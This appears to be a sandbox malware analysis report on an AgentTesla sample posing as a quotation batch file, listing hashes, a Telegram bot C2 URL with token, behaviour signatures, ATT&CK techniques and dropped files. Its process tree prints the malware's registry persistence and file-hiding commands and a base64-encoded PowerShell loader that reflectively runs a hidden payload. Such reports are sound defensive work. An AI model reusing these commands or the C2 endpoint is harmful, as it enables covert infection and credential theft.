Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-03-2023 13:33

General

  • Target

    Quotation 911799 - EM092723.bat

  • Size

    1.3MB

  • MD5

    9f8f23997c4e07be88d8dbe835c8b6ed

  • SHA1

    9f40b97b7e1605b05174a6547b9ff470511d5a1f

  • SHA256

    a354101aa8c8db6f2b337ebc68571edd296d374ad8a99f79fd62d2c07321993e

  • SHA512

    5c0660381331a47163f7cd4e1e87c156966dd8c068d852073429523d29e92c934f3de381a7bd8e6cf1efaf94b21864c91c620b850e93c2399ccef476d8228586

  • SSDEEP

    24576:VXdQ7L0Et7plPQaneOkwJzHqOoLokXb184bQM9w5WpFapcq+14kEKaQ8wV9GtnR:KznmW1VH9w2S4QPGr

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot5663632223:AAG5KHZDs7KWoaqTYx3lSyFlOdfD9vGegQo/

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Detected potential entity reuse from brand microsoft.
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2724
    • C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v Quotation 911799 - EM092723 /d "C:\Users\Admin\AppData\Roaming\Quotation 911799 - EM092723.bat"
      2⤵
        PID:4344
      • C:\Windows\system32\attrib.exe
        attrib +s +h "C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat".exe
        2⤵
        • Sets file to hidden
        • Views/modifies file attributes
        PID:4832
      • C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat.exe
        "C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAPQBKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwD0AScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2740
        • C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat.exe
          "C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:732
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Quotation 911799 - EM092723.bat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            4⤵
            • Enumerates system info in registry
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1940
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf9ee46f8,0x7ffbf9ee4708,0x7ffbf9ee4718
              5⤵
                PID:3620
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                5⤵
                  PID:4016
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1124
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:8
                  5⤵
                    PID:1476
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                    5⤵
                      PID:4732
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
                      5⤵
                        PID:916
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                        5⤵
                          PID:3376
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
                          5⤵
                            PID:2620
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
                            5⤵
                              PID:4852
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                              5⤵
                                PID:888
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
                                5⤵
                                  PID:2840
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
                                  5⤵
                                    PID:4512
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                    5⤵
                                    • Drops file in Program Files directory
                                    PID:3068
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xec,0x114,0x228,0x104,0x22c,0x7ff749555460,0x7ff749555470,0x7ff749555480
                                      6⤵
                                        PID:960
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3060
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                                      5⤵
                                        PID:4480
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,8678171545996154026,14032155170383948232,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
                                        5⤵
                                          PID:620
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=Quotation 911799 - EM092723.bat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                        4⤵
                                          PID:1576
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf9ee46f8,0x7ffbf9ee4708,0x7ffbf9ee4718
                                            5⤵
                                              PID:4716
                                      • C:\Windows\system32\attrib.exe
                                        attrib -s -h "C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat".exe
                                        2⤵
                                        • Views/modifies file attributes
                                        PID:2228
                                    • C:\Windows\System32\CompPkgSrv.exe
                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                      1⤵
                                        PID:1668

                                      Network

                                      MITRE ATT&CK Matrix ATT&CK v6

                                      Persistence

                                      Hidden Files and Directories

                                      2
                                      T1158

                                      Defense Evasion

                                      Hidden Files and Directories

                                      2
                                      T1158

                                      Discovery

                                      Query Registry

                                      2
                                      T1012

                                      System Information Discovery

                                      3
                                      T1082

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        5a10efe23009825eadc90c37a38d9401

                                        SHA1

                                        fd98f2ca011408d4b43ed4dfd5b6906fbc7b87c0

                                        SHA256

                                        05e135dee0260b4f601a0486401b64ff8653875d74bf259c2da232550dbfb4f5

                                        SHA512

                                        89416a3f5bf50cd4a432ac72cd0a7fb79d5aeb10bdcc468c55bbfa79b9f43fab17141305d44cb1fe980ec76cc6575c27e2bcfcbad5ccd886d45b9de03fb9d6d7

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        c1a3c45dc07f766430f7feaa3000fb18

                                        SHA1

                                        698a0485bcf0ab2a9283d4ebd31ade980b0661d1

                                        SHA256

                                        adaba08026551b1b8f6c120143686da79f916d02adbef4a8d1c184e32a19fd48

                                        SHA512

                                        9fc93f01ab4b14f555791d757ffe881787cc697102547c61847552e597e206e70c6d35fedff559c72a0a67d1b95e769095ecb0a8a7d4f07cf58a7a0d57d3e9f4

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        c1a3c45dc07f766430f7feaa3000fb18

                                        SHA1

                                        698a0485bcf0ab2a9283d4ebd31ade980b0661d1

                                        SHA256

                                        adaba08026551b1b8f6c120143686da79f916d02adbef4a8d1c184e32a19fd48

                                        SHA512

                                        9fc93f01ab4b14f555791d757ffe881787cc697102547c61847552e597e206e70c6d35fedff559c72a0a67d1b95e769095ecb0a8a7d4f07cf58a7a0d57d3e9f4

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                        Filesize

                                        152B

                                        MD5

                                        c1a3c45dc07f766430f7feaa3000fb18

                                        SHA1

                                        698a0485bcf0ab2a9283d4ebd31ade980b0661d1

                                        SHA256

                                        adaba08026551b1b8f6c120143686da79f916d02adbef4a8d1c184e32a19fd48

                                        SHA512

                                        9fc93f01ab4b14f555791d757ffe881787cc697102547c61847552e597e206e70c6d35fedff559c72a0a67d1b95e769095ecb0a8a7d4f07cf58a7a0d57d3e9f4

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
                                        Filesize

                                        70KB

                                        MD5

                                        e5e3377341056643b0494b6842c0b544

                                        SHA1

                                        d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                        SHA256

                                        e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                        SHA512

                                        83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk
                                        Filesize

                                        2KB

                                        MD5

                                        9b6268bbbf20ea453eae74034a278918

                                        SHA1

                                        f09303fe9c2f50cb57b17a641c07ced9d0f61a66

                                        SHA256

                                        c4cd86e0db343389efe43167f2839427cfe079daebecf9a48e7bdead48263eb4

                                        SHA512

                                        78d4aa96b118e87118e17425099248ae77faa9b6e1c42d5ed71e0b5eb677af303f4b691a7027cc170f0421c8fba9454704b7b1e1cfc2edf034ed8a9fec289772

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                        Filesize

                                        111B

                                        MD5

                                        285252a2f6327d41eab203dc2f402c67

                                        SHA1

                                        acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                        SHA256

                                        5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                        SHA512

                                        11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        5KB

                                        MD5

                                        da7791effe481822f9ea789fd32f4dd2

                                        SHA1

                                        d69d4c6528c09bef584679f46aa141c06e455299

                                        SHA256

                                        d5d43c86510a55b6c5734f71528867ef2bd6a7f5850aeed828a5eaa00bddea6f

                                        SHA512

                                        6de909c770b5baec51e575f8150bb370c382504e0273e66e5be08f168eea77fcab6a034d9cb24010fd1381375babce6655c60616244c500158d02d484937e077

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                        Filesize

                                        4KB

                                        MD5

                                        660b5411e7dfadac53b846d7e8083a46

                                        SHA1

                                        05ae9b49fff385ac7a385f6e134d25ee03f62fa2

                                        SHA256

                                        69fcbf8bd40df591bfd0ce2f4cf6f37c11af1515a16a5673e951c335e77e816d

                                        SHA512

                                        9efa6e79f9c643d0967daf5e49c2aaf4f52edbb720fc67b0defc55de7be50936bc9a1b031f91aabddff7d18f27b36d6f2c83c0157d7a95d36197719cf279d230

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                        Filesize

                                        24KB

                                        MD5

                                        5edab6d3ffbeee247ccb4423f929a323

                                        SHA1

                                        a4ad201d149d59392a2a3163bd86ee900e20f3d9

                                        SHA256

                                        460cddb95ea1d9bc8d95d295dd051b49a1436437a91ddec5f131235b2d516933

                                        SHA512

                                        263fa99f03ea1ef381ca19f10fbe0362c1f9c129502dc6b730b076cafcf34b40a70ee8a0ee9446ec9c89c3a2d9855450609ec0f8cf9d0a1b2aebdd12be58d38c

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENT
                                        Filesize

                                        16B

                                        MD5

                                        46295cac801e5d4857d09837238a6394

                                        SHA1

                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                        SHA256

                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                        SHA512

                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                        Filesize

                                        16B

                                        MD5

                                        206702161f94c5cd39fadd03f4014d98

                                        SHA1

                                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                        SHA256

                                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                        SHA512

                                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
                                        Filesize

                                        41B

                                        MD5

                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                        SHA1

                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                        SHA256

                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                        SHA512

                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        10KB

                                        MD5

                                        e550b31d592a610d7f27bfbecaf16d7c

                                        SHA1

                                        375809e94ba9dd2c159418f1962eeb9cd24d1a6b

                                        SHA256

                                        ec2fb49153649e64880cee6affad465c4f7441f1c106d39de60cbf07426e2f35

                                        SHA512

                                        d3afc3cbdfb12f18b427121e81c59024ab5c17bce5a8d9fe670b0a4b3f8f9e4d288de109310a32cc053c8a06e5720483467e50f1655bf14389a7237902d3e640

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                        Filesize

                                        12KB

                                        MD5

                                        60ee7accc94600cfd3c7a4060da7a00b

                                        SHA1

                                        5a363d9901bf2f2dc898dbfdd1eafc6b062876c0

                                        SHA256

                                        b4b009c93edf98c4131ab6d760fabf8c10898bd4c4747e84c4b7cdc63bcc85f4

                                        SHA512

                                        7428a91f1b23bf388d2614cf1410391ab0dcd3b65dd43d2658a83273880b35a036290d2ed0297354f7ba990f7d9e1efcdf2db3c8033c6d090edf9e03ecb0eb1f

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                        Filesize

                                        53KB

                                        MD5

                                        06ad34f9739c5159b4d92d702545bd49

                                        SHA1

                                        9152a0d4f153f3f40f7e606be75f81b582ee0c17

                                        SHA256

                                        474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

                                        SHA512

                                        c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Filesize

                                        17KB

                                        MD5

                                        611021a10fc7846eb45fcbf4c8f305ba

                                        SHA1

                                        7ef6972507a1903366eccb98f636fbb18668a6c1

                                        SHA256

                                        ad9798bb1fe35179be08da5e5967fffb10dea4588f762f58303cab19b3ca36f0

                                        SHA512

                                        a68b6d9a899e7f5788abd255f46928f061e341083ab812a77f43602a10cd181f30d9b14eea79c8ae16a179b3cb623bd8837f16d39644dab4b9fb7aec3f87b129

                                      • C:\Users\Admin\AppData\Local\Temp\Quotation 911799 - EM092723.bat.exe
                                        Filesize

                                        423KB

                                        MD5

                                        c32ca4acfcc635ec1ea6ed8a34df5fac

                                        SHA1

                                        f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

                                        SHA256

